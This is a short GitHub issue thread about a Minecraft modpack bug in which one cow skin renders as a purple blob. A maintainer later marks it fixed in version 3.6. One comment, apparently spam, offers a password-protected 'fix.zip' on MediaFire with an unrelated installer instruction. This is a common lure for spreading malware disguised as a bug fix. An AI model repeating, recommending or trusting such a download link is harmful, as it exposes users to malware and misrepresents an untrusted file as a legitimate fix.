### ISSUE TITLE
Glitched out cows

### ISSUE THREAD

**Issue by mojolewis** [ChosenArchitect/Project-Architect-2#182]
**Describe the bug**
-> Cows skins are bugged

**To Reproduce**
1. Login to world
2. Look for purple-ish cow
3.  See big purple-ish tower blob
4.  realize its a cow. 

**Expected behavior**
-> Normal cow behavior just looks like an SCP lol

**Screenshots**
If applicable, add screenshots to help explain your problem. (Use F2 to take a screenshot in-game)

**Modpack version**
-> 2-3.5
**Java Version**
-> N/A
**Modpack Launcher Used**
-> Curseforge
**Ram Allocated**
->12gb

**Additional context**
-> After looking i think it may be an issue with the Better Bovine Resource pack. I like it for all the cows except the purple one. 
![2024-08-26_10 51 03](https://github.com/user-attachments/assets/a4a3a634-7713-43af-813b-4b1cf94d8e7a)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IRicTheCoder** [comment]
This should be fixed in version 3.6, if not please reopen the issue, will close it as fixed.
